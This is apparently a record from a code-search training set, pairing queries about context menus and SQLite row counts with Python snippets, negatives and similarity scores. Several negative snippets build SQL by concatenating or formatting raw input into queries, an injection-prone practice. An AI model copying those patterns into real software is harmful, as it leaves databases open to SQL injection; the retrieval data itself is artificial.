\"System/copy.png\"))\n icon_paste = QtGui.QIcon(os.path.join(self.iconsPath, \"System/paste.png\"))\n icon_reset = QtGui.QIcon(os.path.join(self.iconsPath, \"System/reset.png\"))\n icon_delete = QtGui.QIcon(os.path.join(self.iconsPath, \"System/delete.png\"))\n icon_mirror = QtGui.QIcon(os.path.join(self.iconsPath, \"System/mirrorXforms.png\"))\n icon_createMirror = QtGui.QIcon(os.path.join(self.iconsPath, \"System/createMirror.png\"))\n\n # create the context menu\n if networkNode != \"ART_Root_Module\":\n self.contextMenu = QtWidgets.QMenu()\n self.contextMenu.addAction(icon_copy, \"Copy Settings\", self.copySettings)\n self.contextMenu.addAction(icon_paste, \"Paste Settings\", self.pasteSettings)\n self.contextMenu.addAction(icon_reset, \"Reset Settings\", self.resetSettings)\n\n self.contextMenu.addSeparator()\n if mirror != None:\n self.contextMenu.addAction(icon_mirror, \"Mirror Transformations to \" + mirror,\n self.mirrorTransformations)\n\n self.contextMenu.addAction(icon_createMirror, \"Create Mirror of this Module\", self.createMirrorOfModule_UI)\n self.contextMenu.addSeparator()\n\n self.contextMenu.addAction(icon_delete, \"Delete Module\", self.deleteModule)\n self.contextMenu.exec_(self.groupBox.mapToGlobal(point))", "def onContextMenu(self, event):\n # Skipping the save state functionality for release 0.9.0\n # return\n pos = event.GetPosition()\n pos = self.ScreenToClient(pos)\n self.PopupMenu(self.popUpMenu, pos)", "def get_context_menu(self, qpoint):\n menu = QMenu(self)\n index = self.view.indexAt(qpoint)\n\n def add_action(menu, text, handler, icon=None):\n a = None\n if icon is None:\n a = QAction(text, self)\n else:\n a = QAction(icon, text, self)\n a.triggered.connect(handler)\n menu.addAction(a)\n\n add_action(menu, \"Color selection\", self._handle_color_selection)\n\n # duplication here with vstructui\n color_menu = menu.addMenu(\"Color selection...\")\n\n # need to escape the closure capture on the color loop variable below\n # hint from: http://stackoverflow.com/a/6035865/87207\n def make_color_selection_handler(color):\n return lambda: self._handle_color_selection(color=color)\n\n for color in QT_COLORS:\n add_action(color_menu, \"{:s}\".format(color.name),\n 
make_color_selection_handler(color.qcolor), make_color_icon(color.qcolor))\n\n start = self._hsm.start\n end = self._hsm.end\n cm = self.getColorModel()\n if (start == end and cm.is_index_colored(start)) or cm.is_region_colored(start, end):\n def make_remove_color_handler(r):\n return lambda: self._handle_remove_color_range(r)\n\n remove_color_menu = menu.addMenu(\"Remove color...\")\n for cr in cm.get_region_colors(start, end):\n pixmap = QPixmap(10, 10)\n pixmap.fill(cr.color)\n icon = QIcon(pixmap)\n add_action(remove_color_menu,\n \"Remove color [{:s}, {:s}], len: {:s}\".format(h(cr.begin), h(cr.end), h(cr.end - cr.begin)),\n make_remove_color_handler(cr), make_color_icon(cr.color))\n\n menu.addSeparator() # -----------------------------------------------------------------\n\n add_action(menu, \"Copy selection (binary)\", self._handle_copy_binary)\n copy_menu = menu.addMenu(\"Copy...\")\n add_action(copy_menu, \"Copy selection (binary)\", self._handle_copy_binary)\n add_action(copy_menu, \"Copy selection (text)\", self._handle_copy_text)\n add_action(copy_menu, \"Copy selection (hex)\", self._handle_copy_hex)\n add_action(copy_menu, \"Copy selection (hexdump)\", self._handle_copy_hexdump)\n add_action(copy_menu, \"Copy selection (base64)\", self._handle_copy_base64)\n\n menu.addSeparator() # -----------------------------------------------------------------\n\n add_action(menu, \"Add origin\", lambda: self._handle_add_origin(index))\n return menu", "def about_right_click(event):\n popup_menu = Menu(tearoff=0)\n popup_menu.add_command(label='Copy')\n\n popup_menu.post(event.x_root, event.y_root)", "def contextMenuEvent(self, event):\n menu = QtWidgets.QMenu(self)\n\n menu.addAction(cuegui.Action.create(self,\n \"Select matching jobs (Enter)\",\n \"Select matching jobs\",\n self._actionSelect))\n\n menu.addAction(cuegui.Action.create(self,\n \"Clear\",\n \"Clear text\",\n self.actionClear))\n\n menu.exec_(QtCore.QPoint(event.globalX(), event.globalY()))", "def Build(self, context, contextCallback=None, parent=None):\n # type: (MenuContext, Optional[Callable], Optional[QtWidgets.QWidget]) -> Optional[QtWidgets.QMenu]\n menu = QtWidgets.QMenu(self.name, parent)\n for action in self.actions:\n action.AddToMenu(menu, context, contextCallback=contextCallback)\n if not menu.isEmpty():\n return menu", "def request_context_menu(self, pos):\n super(ItemListView, self).request_context_menu(pos)\n self.get_selected()\n self.manage_actions()\n self.display_context_menu(pos)", "def _contextMenu(self, pos):\n # Create the context menu\n menu = qt.QMenu(self)\n menu.addAction(self._zoomBackAction)\n if self.isRightAxisVisible:\n menu.addMenu(self._zoomEnabledAxesMenu)\n menu.addSeparator()\n menu.addAction(self._crosshairAction)\n\n plotArea = self.getWidgetHandle()\n globalPosition = plotArea.mapToGlobal(pos)\n menu.exec(globalPosition)", "def makeActionMenu(self):\n\t\tself.newAct = QtGui.QAction(self.tr(\"&Novo\"),self)\n\t\tself.newAct.setShortcut(self.tr(\"Ctrl+N\"))\n\t\tself.newAct.setStatusTip(self.tr(\"Cria uma nova area de desenho em branco\"))\n\t\tself.connect(self.newAct,SIGNAL(\"triggered()\"),self.glwidget.newFile)\n\t\t\n\t\tself.openAct = QtGui.QAction(self.tr(\"&Abrir\"),self)\n\t\tself.openAct.setShortcut(self.tr(\"Ctrl+o\"))\n\t\tself.openAct.setStatusTip(self.tr(\"Abrir arquivo do elvis\"))\n\t\tself.connect(self.openAct,SIGNAL(\"triggered()\"),self.glwidget.openElvisfile)\t\t\n\n\t\tself.saveAct = 
QtGui.QAction(self.tr(\"&Salvar\"),self)\n\t\tself.saveAct.setShortcut(self.tr(\"Ctrl+S\"))\n\t\tself.saveAct.setStatusTip(self.tr(\"Salva a imagem do canvas\"))\n\t\tself.connect(self.saveAct,SIGNAL(\"triggered()\"),self.glwidget.saveElvisfile)\n\t\t\n\t\tself.exportAct = QtGui.QAction(self.tr(\"&Exportar SVG\"),self)\n\t\tself.exportAct.setShortcut(self.tr(\"Ctrl+E\"))\n\t\tself.exportAct.setStatusTip(self.tr(\"Exporta para formato SVG\"))\n\t\tself.connect(self.exportAct,SIGNAL(\"triggered()\"),self.glwidget.ExportSVG)\n\t\t\t\t\n\t\t\n\t\tself.exitAct = QtGui.QAction(self.tr(\"&Sair\"),self)\n\t\tself.exitAct.setStatusTip(self.tr(\"Sair do programa\"))\n\t\tself.connect(self.exitAct,SIGNAL(\"triggered()\"),self.close)\n\t\t\n\t\n\t\tself.aboutAct = QtGui.QAction(self.tr(\"&Sobre\"),self)\n\t\tself.aboutAct.setStatusTip(self.tr(\"Sobre o programa\"))\n\t\tself.connect(self.aboutAct,SIGNAL(\"triggered()\"),self.about)", "def _addMenu(self):\n self.action = QAction(QIcon(), 'WakaTime', self)\n self.action.triggered.connect(self._promptForApiKey)\n fileMenu = e5App().getObject('UserInterface').getMenu('file')\n fileMenu.addAction(self.action)", "def origin_context_menu(self, context):\n self.layout.separator()\n self.layout.operator(\"object.quick_set_origin\")", "def __handleShowContextMenu(self, coord):\n coord = self.mapToGlobal(coord)\n self.__menu.popup(coord)" ]
[ "0.7556599", "0.74964786", "0.7235469", "0.714675", "0.6928441", "0.6839094", "0.68082815", "0.6805799", "0.68024814", "0.6796827", "0.6790282", "0.677154", "0.676619", "0.6764652", "0.67637086", "0.67262745", "0.6709449", "0.66774523", "0.6611824", "0.6609954", "0.6595786", "0.6540596", "0.6520664", "0.6474391", "0.64730245", "0.6472471", "0.6394035", "0.63854706", "0.63782495", "0.6375136" ]
0.77636343
0
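For reference, a minimal runnable sketch of the submenu/separator pattern that the document above and its near-duplicate negatives share, assuming PyQt5; the labels and handlers are illustrative stand-ins, not taken from the source:

```python
from PyQt5.QtWidgets import QApplication, QMenu

def build_copy_menu(parent=None):
    menu = QMenu(parent)
    menu.addAction("Copy selection (binary)", lambda: print("copy binary"))
    copy_menu = menu.addMenu("Copy...")
    for label in ("text", "hex", "hexdump", "base64"):
        # Bind the loop variable through a default argument -- the same
        # late-binding fix the source performs with its make_*_handler
        # factory functions.
        copy_menu.addAction("Copy selection ({})".format(label),
                            lambda fmt=label: print("copy", fmt))
    menu.addSeparator()
    menu.addAction("Add origin", lambda: print("add origin"))
    return menu

if __name__ == "__main__":
    app = QApplication([])
    build_copy_menu().exec_()  # pops the menu up; picking an item returns
```

The factory/default-argument trick matters because a plain `lambda: handler(label)` inside the loop would see only the final value of `label`.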
Inputs values into a table in the database.
def input_values(curs, table_name, inputs):
    curs.executemany("""INSERT INTO {} (s, x, y) VALUES (?, ?, ?);""".format(table_name), inputs)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def insert_values():\n pass", "def insertByHand(self):\n\n fieldValues = []\n for field in self.fieldNames:\n fieldValues.append(raw_input(\"Give \" + field + \": \"))\n\n print(self.tableName + \".insert(\" + str(fieldValues) + \")\")\n\n self.insert(fieldValues)", "def insertData(table, column, input):\n\ttry:\n\t\tcon = sqlite3.connect('PampDb.db')\n\t\tcur = con.cursor()\n\t\tcur.execute(\"INSERT INTO '\" + table + \"' (\" + column + \") VALUES ('\" + input + \"')\")\n\t\tcon.commit()\n\t\tcon.close()\n\texcept:\n\t\tprint('Could not run function insertData from DbController')", "def insert(self,table,values):\n self.connect.execute(self.insert_disc[table],values)\n self.connect.commit()", "def do_update_data(self, *args):\n print(\"Provide data to update :\")\n id_field = dict()\n id_field['id'] = input(\"Provide id to update :\")\n values = {**id_field, **self.__class__.populate_data()}\n self.connection_obj.update_into_table(**values)\n print(\"Data Update Successful\")", "def do_insert_data(self, *args):\n print(\"Provide data to insert\")\n self.connection_obj.insert_into_table(**self.__class__.populate_data())\n print(\"Data Insertion Successful\")", "def add_entry(db, table, columns, values):\n mycursor = db.cursor()\n\n sql = \"INSERT INTO \" + table + \" (\" + parse_sql_param_from_array(columns) + \") VALUES (\" + parse_sql_param_from_array(values, escape=True) + \")\"\n mycursor.execute(sql)\n\n db.commit()", "def populate_table(database, table, data):\n\n for row in data:\n database.session.add(table(row))\n database.session.commit()", "def populate_table(self, data):\n\n db = self.connection(database=\"imdb\")\n\n try:\n cur = db.cursor()\n sql = \"\"\"\n INSERT INTO film (title, film_id, year, director, cast, rating, poster_url) \n VALUES (%s, %s, %s, %s, %s, %s, %s);\n \"\"\"\n cur.execute(sql, data)\n db.commit()\n except:\n print(\"An error occurred when saving the data!\")\n\n db.close()", "def add(self):\n try:\n self.active_table.add_row(Row.Row([obj.get() for obj in self.enter_values]))\n self.parent.display_content()\n self.master.withdraw()\n except UnableToCastException as err:\n messagebox.showerror(\"Error\", err)", "def insert_to_table(self, tableName, dataRow, colNames):\n queryString = f\"INSERT INTO {tableName} VALUES \"\n # building the Values list\n valueString = \"\"\n # looping \n for value in dataRow:", "def add_entry(self, table_name, values):\n with self.connection.cursor() as cursor:\n result = cursor.execute(self.get_select_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n if result is 0:\n cursor.execute(self.get_insert_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n cursor.execute(self.get_select_mysql_command(**DialogueDbHelper.MYSQL_ARGUMENTS[table_name]), values)\n self.connection.commit()\n return cursor.fetchone()[0]", "def insert_row(self, tablename, fields):\n insert_params = \"(\" + \",\".join(['?' 
for x in fields]) + \")\"\n self.cursor.execute(\"insert into \" + tablename + \" values \" +\n insert_params, fields)", "def update(table, id_):\n\n # your code\n key = common.check_for_key(id_,table)\n if key == None:\n ui.print_error_message('Key does not exist')\n else:\n return_inputs = ui.get_inputs(['Name', 'Age'], 'Enter New Values')\n modif_index = key\n\n table[modif_index][NAME] = return_inputs[FIRST_PROP]\n table[modif_index][AGE] = return_inputs[SECOND_PROP]\n data_manager.write_table_to_file('hr/persons.csv', table) \n\n return table", "def run(self):\n self.db.table('points').insert({\n 'name': 'biblioteca',\n 'rfid': '123456'\n })", "def db_values(self, db):", "def run_insert_example():\n table = \"actors\"\n insert_values = {\n 'id': 3,\n 'name': \"Matt\",\n 'last_name': \"Smith\",\n 'country': \"England\"}\n print querify.insert_from_dict(table, insert_values)\n\n insert_col_list = [\"id\", \"name\", \"last_name\", \"country\"]\n insert_val_list = [\n [1, \"Chris\", \"Eccleston\", \"England\"],\n [2, \"David\", \"Tennant\", \"Scotland\"],\n [3, \"Matt\", \"Smith\", \"England\"]]\n print querify.insert_from_list(table, insert_col_list, insert_val_list)", "async def add_entry(self, **values):\r\n query = \"INSERT OR IGNORE INTO {table_name} ({table_headers}) VALUES({entry_values})\"\r\n\r\n headers = \", \".join([e for e in values.keys()])\r\n entry_val = \", \".join(\"?\"*len(values.values()))\r\n attrs = [e for e in values.values()]\r\n\r\n query = query.format(table_name = self.name, table_headers=headers, entry_values=entry_val)\r\n\r\n await self.data.db.execute(query, attrs)\r\n await self.data.db.commit()", "def _store_entry_in_table(conn, table_name, entry):\n # Create entry insertion template.\n template = ('?, ' * len(entry)).rstrip(', ') # \"?\" for each value\n template = '(%s)' % template # enclose in parentheses\n # Try to insert a new row into the table.\n with conn:\n cur = conn.cursor()\n cur.execute('INSERT INTO %s VALUES%s' % (table_name, template), entry)", "def form(self, table, column, info):\n info = info.replace(\" \",\"\")\n data = info.split(',')\n value = \"'\" + data[0]\n for i in xrange(1, len(data)):\n value = value + \"', '\" + data[i]\n value = value + \"'\"\n\n if self.type == \"select\":\n statement = \"\"\"SELECT * FROM %s WHERE %s=%s\"\"\" %(table, column, value)\n return statement\n elif self.type == \"insert\":\n statement = \"\"\"INSERT INTO %s(%s) VALUES(%s)\"\"\" %(table, column, value)\n return statement\n elif self.type == \"update\":\n statement = \"\"\"UPDATE %s SET %s='%s' WHERE %s='%s'\"\"\" %(table, column, data[0], column, data[1])\n return statement", "def insert_values(self, table, cols, vals):\n conn = psycopg2.connect(self.name, sslmode='require')\n c = conn.cursor()\n c.execute(\"INSERT INTO {0} ({1}) VALUES ({2})\".format(table,','.join(str(i) for i in cols), ','.join(\"'\"+str(i)+\"'\" for i in vals)))\n conn.commit() \n conn.close", "def saveData(self,event=None):\r\n self.checkTitle()\r\n self.checkAffiliation()\r\n\r\n checkCur = self.dbConn.execute(\r\n \"SELECT * FROM People WHERE Firstname = ? 
AND Lastname=?\",\r\n [self.first.getVal(),self.last.getVal()])\r\n res = checkCur.fetchall()\r\n if len(res)==0: \r\n sqlStr = str.format(\"INSERT INTO {} ({}) VALUES ({})\",\r\n self.dataTable,\",\".join(self.dataCols),\"?\"+\",?\"*(len(self.dataCols)-1))\r\n cur = self.dbConn.execute(sqlStr,self.getData())\r\n self.dbConn.commit()\r\n else:\r\n for person in res:\r\n print(str.format(\"{} {} works for {}\",\r\n person[\"Firstname\"],person[\"Lastname\"],person[\"affiliation\"]))\r\n\r\n self.first.setVal(\"\"),\r\n self.middle.setVal(\"\"),\r\n self.last.setVal(\"\"),\r\n self.suffix.setVal(\"\"),\r\n self.phone.setVal(\"\"),\r\n self.ext.setVal(\"\"),\r\n self.email.setVal(\"\")", "def add(table):\n\n # your code\n\n \n \n\n return_inputs = ui.get_inputs(['Name', 'Year'],\"Please enter a new record.\")\n key = str(common.generate_random(table))\n table.append([key,return_inputs[FIRST_PROP] , str(return_inputs[SECOND_PROP])])\n data_manager.write_table_to_file('hr/persons.csv', table)\n\n\n return table", "def sit(self, table):\n self.table = table", "def insertData(self, table, title, rating, authorinfo, pubinfo):\n\n\t\tsql = \"insert into %s (bookname, authorinfo, pubinfo, rating) \\\n\t\t\tvalues('%s', '%s', '%s', '%s')\" %(table, title, authorinfo,\n\t\t\tpubinfo, rating)\n\t\ttry:\n\t\t\tself.cursor.execute(sql)\n\t\t\tself.conn.commit()\n\t\texcept Exception, e:\n\t\t\tsys.exit()", "def add_to_database():\n db_conn.execute(\"INSERT INTO Fietsenstalling (Naam, Achternaam, Adress, FietsNr, PIN) VALUES \"\n \"(?, ?, ?, ?, ?);\",(Naam, Achternaam, Adress, FietsNr, PIN))\n\n db_conn.commit()", "def add(table):\n\n # your code\n row = []\n row.append(common.generate_random(table))\n\n inputs = ui.get_inputs([\"TITLE: \", \"MANUFACTURER: \", \"PRICE: \", \"STOCK: \"], \"Fill the records below: \")\n for i in inputs:\n row.append(i)\n\n table.append(row)\n\n return table", "def form_insert_query(self, table_name, input_data, table_fields_names=None, table_fields_types=None):\n\n\t\t# creating first part of the query -> section with columns' names\n\t\tquery_table_structure = self.build_query_part(table_fields_names, table_fields_types, query_part=1)\n\n\t\t# creating second part of the query -> section with values\n\t\tquery_values = self.build_query_part(input_data, table_fields_types, query_part=2)\n\t\t\n\t\t# form query\n \t\tquery = 'INSERT INTO ' + table_name + ' ' + query_table_structure + ' VALUES ' + query_values\n\n\t\treturn query", "def insert(self, table, value):\n col_name = self.table_cols[table][1:]\n sql = \"INSERT INTO %s(%s) VALUES (%s)\" % (table, str(','.join(col_name)), array_join(value, ','))\n Log.debug('DB -> %s' % sql)\n self.execute(sql)", "def __insert_row_column_module(self,\n table_name,\n form_data,\n description_id):\n\n select = Select(self.db)\n column_names = select.read_column_names(table_name)\n\n number_of_rows = form_data.get(\"numberOf\" + table_name, 0)\n if int(number_of_rows) == 0:\n return 0\n\n for row_num in range(1, int(number_of_rows)+1):\n sql_values = {}\n sql_statement = []\n sql_fields = []\n alt_sql_statement = []\n alt_sql_fields = []\n\n sql_statement.append(\"INSERT INTO \" + table_name + \" SET \")\n alt_sql_statement.append(\"INSERT INTO \" + table_name + \" SET \")\n sql_fields.append(\"`Description_ID`=:description_id\")\n alt_sql_fields.append(\"`Description_ID`=%(description_id)s\")\n sql_values['description_id'] = description_id\n\n for k in column_names:\n field_name = k[0] + \"_###_\" + str(row_num)\n if not 
form_data.get(field_name):\n continue\n\n value = form_data.get(field_name)\n if k[0].find(\"_ID\") < 0 and value:\n key = k[0]\n key = key.replace(\"(\", \"\")\n key = key.replace(\")\", \"\")\n key = key.replace(\":\", \"\")\n key = key.replace(\"%\", \"\")\n sql_fields.append(\"`\" + k[0] + \"`=:\" + key.lower())\n alt_sql_fields.append(\"`\" + k[0] + \"`=%(\" + key.lower() + \")s\")\n sql_values[key.lower()] = value.strip()\n\n sql_statement.append(\",\".join(sql_fields))\n alt_sql_statement.append(\",\".join(alt_sql_fields))\n\n session = self.db_conn.cursor(raw=True)\n try:\n #print(\"\".join(alt_sql_statement) % sql_values)\n session.execute(\"\".join(alt_sql_statement), sql_values)\n self.db_conn.commit()\n #print(\"SQL: \" + session.statement)\n except Exception as e:\n #print(\"ERROR: \" + str(e))\n try:\n # may be there is a spl char in the sql stmt\n # using connection().execute will not quote the sql stmt\n # and some messy hack is needed to avoid param execution\n sql_stmt = \" \".join(alt_sql_statement)\n sql_stmt = sql_stmt.replace(\"(%)\", \"(##)\")\n sql_stmt = sql_stmt.replace(\"%_\", \"##_\")\n sql_stmt = sql_stmt % sql_values\n sql_stmt = sql_stmt.replace(\"(##)\", \"(%)\")\n sql_stmt = sql_stmt.replace(\"##_\", \"%_\")\n #print(\"ALT SQL:\")\n #print(sql_stmt)\n session.execute(sql_stmt)\n self.db_conn.commit()\n except Exception:\n #session.rollback()\n raise\n finally:\n session.close()\n\n return 1" ]
[ "0.66245425", "0.6569825", "0.65506077", "0.6475767", "0.62920696", "0.6261432", "0.62417054", "0.60498255", "0.6047792", "0.60193795", "0.59682614", "0.5960599", "0.59450805", "0.5943396", "0.59352744", "0.5807773", "0.5787951", "0.5777822", "0.5770113", "0.57534796", "0.57456434", "0.57408583", "0.57232106", "0.57042193", "0.5688866", "0.56850475", "0.56806856", "0.56649005", "0.5663384", "0.5620644" ]
0.68125886
0
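A self-contained sqlite3 round trip for the `executemany` pattern in this record; the `(s, x, y)` schema comes from the snippet itself, while the table name and sample rows are made up for the demo:

```python
import sqlite3

def input_values(curs, table_name, inputs):
    curs.executemany("""INSERT INTO {} (s, x, y) VALUES (?, ?, ?);""".format(
        table_name), inputs)

conn = sqlite3.connect(":memory:")
curs = conn.cursor()
curs.execute("CREATE TABLE points (s TEXT, x INTEGER, y INTEGER);")
input_values(curs, "points", [("a", 1, 2), ("b", 3, 4)])
conn.commit()
print(curs.execute("SELECT COUNT(*) FROM points;").fetchone()[0])  # -> 2
```

Note the split responsibility: only the identifier is spliced in with `format`, while every value travels through `?` placeholders, which is what keeps the insert safe from injection.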
Queries the database for the number of rows in a table where x is greater than or equal to x_gte and y is greater than or equal to y_gte.
def count_rows_greater(curs, table_name, x_gte=5, y_gte=5):
    assert x_gte is not None or y_gte is not None
    where_str = ""
    val = None
    if x_gte is None:
        where_str = "WHERE y >= ?"
        val = (y_gte,)
    elif y_gte is None:
        where_str = "WHERE x >= ?"
        val = (x_gte,)
    else:
        where_str = "WHERE x >= ? AND y >= ?"
        val = (x_gte, y_gte)
    return curs.execute("""SELECT COUNT(*) FROM {} {};""".format(
        table_name, where_str), val).fetchone()[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def rpc_database_count_rows(self, *args):\n\t\targs = list(args)\n\t\tfields = self.path.split('/')[1:-2]\n\t\tassert len(fields) == len(args)\n\t\ttable = DATABASE_TABLE_OBJECTS.get(self.path.split('/')[-2])\n\t\tassert table\n\t\tsession = db_manager.Session()\n\t\tquery = session.query(table)\n\t\tquery = query.filter_by(**dict(zip((f + '_id' for f in fields), args)))\n\t\tresult = query.count()\n\t\tsession.close()\n\t\treturn result", "def howmany_within_range(row, minimum, maximum):\n count = 0\n for n in row:\n if minimum <= n <= maximum:\n count = count + 1\n return count", "def query_range(tree, start_y, start_x, end_y, end_x):\n res = 0\n start_y -= 1\n\n while end_y > start_y:\n res += bit.query_range(tree[end_y], start_x, end_x)\n end_y -= (end_y & -end_y)\n\n while start_y > end_y:\n res -= bit.query_range(tree[start_y], start_x, end_x)\n start_y -= (start_y & -start_y)\n\n return res", "def test_query_hits(config):\n psp = PostgreSQLProvider(config)\n results = psp.query(resulttype=\"hits\")\n assert results[\"numberMatched\"] == 14776\n\n results = psp.query(\n bbox=[29.3373, -3.4099, 29.3761, -3.3924], resulttype=\"hits\")\n assert results[\"numberMatched\"] == 5\n\n results = psp.query(properties=[(\"waterway\", \"stream\")], resulttype=\"hits\")\n assert results[\"numberMatched\"] == 13930", "async def count_rows(self, query: str, args: Optional[Iterable]=None) -> float:\n res = await self.fetch_all(query, args)\n return len(res)", "def interval_query(cur, table, start, num_rows):\n nresults = cur.execute(\"\"\"SELECT * FROM {} LIMIT {},{}\"\"\".format(table, start, num_rows))\n return nresults, cur", "def test_query_expression_count(self):\r\n assert self.table.objects.count() == 12\r\n\r\n q = self.table.objects(self.table.column('test_id') == 0)\r\n assert q.count() == 4", "def num_older_than(age: float) -> int:\r\n cur = con.cursor()\r\n count_older = cur.execute(\r\n \"\"\"SELECT COUNT(Patient_ID)\r\n FROM Patient\r\n WHERE (JULIANDAY('now') - JULIANDAY(Date_Of_Birth)) / ? 
> ?\"\"\",\r\n [DAYS_IN_YEAR, age],\r\n ).fetchall()\r\n\r\n return count_older[0][0]", "def get_num_tiles(grid_bbox, dxy): \r\n xmin, xmax, ymin, ymax = grid_bbox\r\n return (int(np.abs(ymax-ymin)/dxy), int(np.abs(xmax-xmin)/dxy))", "def test_rows_removed_greater_than_unsent_removed():\n stmt = sqlalchemy.select([_LOGGING_TABLE.c.total_rows_removed,\n _LOGGING_TABLE.c.total_unsent_rows_removed]).select_from(_LOGGING_TABLE).order_by(\n _LOGGING_TABLE.c.id)\n\n result = execute_command_with_return_value(stmt)\n assert [value[0] >= value[1] for value in result]", "def count_alive_cells(self, x, y):\n\n # indices of surrounding cells.\n ul = max(y - 1, 0) # upper left\n ur = min(y + 2, self.f_shape[1]) # upper right\n bl = max(x - 1, 0) # bottom left\n br = min(x + 2, self.f_shape[0]) # bottom right\n\n # slice\n cells = self.cells[bl:br, ul:ur]\n n_cells = np.count_nonzero(cells)\n\n return n_cells - self.cells[x][y]", "def count(self, table, field, condition, *parameters, **kwparameters):\n table = self.prefix + table\n field = 'COUNT(' + field + ') AS rows_count'\n query = \"SELECT \" + field + \" FROM \" + table + \" \" + condition\n rows_count = self.query(query, *parameters, **kwparameters)\n if rows_count:\n return int(rows_count[0][\"rows_count\"])\n else:\n return 0", "def rangeQuery(self, x):\n \n neighbors = []\n \n for y in range(len(self.df)):\n q = self.df[y, :2]\n if self.dist(x, q) <= self.epsilon:\n neighbors.append(y)\n \n return neighbors", "def count(self):\n return self.query.count(with_limit_and_skip = True)", "def test_apply_filter_geq(app):\n with app.app_context():\n users = User.query\n users = apply_filter(users, User,\n {'column': 'id', 'type': 'geq',\n 'value': '1'})\n assert str(users.whereclause) == 'users.id >= :id_1'", "def getHits(self, timestamp):\n hit = 0\n for i in self.l:\n if i<=timestamp and i>timestamp-300:\n hit += 1\n return hit", "def rectangles_in_grid(x_f, y_f):\n count = 0\n for x in range(x_f):\n for y in range(y_f):\n for i in range(x, x_f):\n for j in range(y, y_f):\n count += 1\n return count", "def test_counts(pawprint_default_tracker_db_with_table):\n\n tracker = pawprint_default_tracker_db_with_table\n\n # Add a bunch of events\n query = (\n \"\"\"\n INSERT INTO {} (timestamp, user_id, event) VALUES\n ('2016-01-01 12:30', 'alice', 'logged_in'),\n ('2016-01-01 12:40', 'bob', 'logged_in'),\n ('2016-01-01 16:00', 'charlotte', 'logged_in'),\n ('2016-01-02 00:00', 'dan', 'logged_in'),\n ('2016-01-02 00:00', 'elizabeth', 'logged_in'),\n ('2016-01-05 00:00', 'frank', 'logged_in'),\n ('2016-01-10 00:00', 'gabrielle', 'logged_in'),\n ('2016-01-20 00:00', 'hans', 'logged_in'),\n ('2016-02-01 00:00', 'iris', 'logged_in'),\n ('2016-02-01 00:00', 'james', 'logged_in'),\n ('2016-03-01 00:00', 'kelly', 'logged_in'),\n ('2016-03-01 00:00', 'laura', 'logged_in'),\n ('2016-03-01 00:00', 'mike', 'not_logged_in')\n \"\"\"\n ).format(tracker.table)\n\n pd.io.sql.execute(query, tracker.db)\n\n logins_hourly = tracker.count(event=\"logged_in\", resolution=\"hour\")\n logins_daily = tracker.count(event=\"logged_in\")\n logins_weekly = tracker.count(event=\"logged_in\", resolution=\"week\")\n logins_monthly = tracker.count(event=\"logged_in\", resolution=\"month\")\n logins_weekly_left_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", start=datetime(2016, 2, 1)\n )\n logins_weekly_right_range = tracker.count(\n event=\"logged_in\", resolution=\"week\", end=datetime(2016, 2, 1)\n )\n logins_daily_full_range = tracker.count(\n event=\"logged_in\", 
start=datetime(2016, 1, 15), end=datetime(2016, 2, 15)\n )\n\n # Hourly\n assert len(logins_hourly) == 8\n assert np.all(logins_hourly[\"count\"].values == [2, 1, 2, 1, 1, 1, 2, 2])\n\n # Daily\n assert len(logins_daily) == 7\n assert np.all(logins_daily[\"count\"].values == [3, 2, 1, 1, 1, 2, 2])\n\n # Weekly\n assert len(logins_weekly) == 5\n assert np.all(logins_weekly[\"count\"].values == [5, 2, 1, 2, 2])\n\n # Others\n assert len(logins_monthly) == 3\n assert len(logins_weekly_left_range) == 2 # weeks start on Monday\n assert len(logins_weekly_right_range) == 4 # and not at the start / end dates provided\n assert len(logins_daily_full_range) == 2", "def count(self, query):", "def _get_hit_count(self, database, enquire):\n return self._get_enquire_mset(\n database, enquire, 0, database.get_doccount()\n ).size()", "def getVisibleRows(self, y1, y2):\n start = self.getRowPosition(y1)\n end = self.getRowPosition(y2) + 1\n if end > self.rows:\n end = self.rows\n return start, end", "def query_four(self, table_name):\n\n query = (\n \"SELECT user_id, COUNT(*) as NumActivites \"\n \"FROM %s \"\n \"WHERE DATEDIFF(start_date_time, end_date_time) = -1 \"\n \"GROUP BY user_id \"\n )\n\n self.cursor.execute(query % (table_name))\n rows = self.cursor.fetchall()\n print(tabulate(rows, headers=self.cursor.column_names))\n return rows", "def compute(self, check_range=(None, None)):\n\n self.check_since, self.check_until = check_range\n\n df = self.df\n\n if self.check_since is not None:\n df = df[df['created_date'] < self.check_since]\n\n if self.check_until is not None:\n df = df[df['created_date'] >= self.check_until]\n\n count_new_committers = len(df.index)\n return count_new_committers", "def f02_03_countElemBetween(l, a, b):\n return sum([a < x < b for x in l])", "def count_equal_and_count_less(self, value):\n n_less = 0\n cursor = self.root\n while cursor is not self._NIL_NODE:\n if cursor.value == value:\n n_less += cursor.left_subtree_size\n return cursor.count, n_less\n elif cursor.value < value:\n n_less += cursor.left_subtree_size + cursor.count\n cursor = cursor.right\n else:\n cursor = cursor.left\n\n return 0, n_less", "def gt(self, x, y):\n return self.lt(y,x)", "def count(self, table, q_filter=None):\n try:\n with self.lock:\n return sum(1 for x in self._find(table, self._format_filter(q_filter)))\n except DbException:\n raise\n except Exception as e: # TODO refine\n raise DbException(str(e))", "def compute_outliers(data: np.ndarray, data_range: typing.Tuple[float, float]) -> int:\n return np.count_nonzero((data >= data_range[0]) & (data < data_range[1]))", "def checkRowInTable(table, conditions):\n select = \"SELECT COUNT(*) FROM {0}\".format(table)\n if conditions is None:\n return select\n else:\n select += \" WHERE \"\n for c in conditions:\n select += \"{0}=\\'{1}\\' AND \".format(c[0], c[1])\n return select[:-5] + \" ALLOW FILTERING\"", "def count(self, qid):\n\n bbox = (\n self.to_frame()\n .query(f\"id == '{qid}'\")\n .geometry.bounds.values.flatten()\n .tolist()\n )\n\n # Get points that intersect the quadrant\n point_int = list(self.sindex.intersection(bbox))\n\n return len(point_int) if point_int else 0" ]
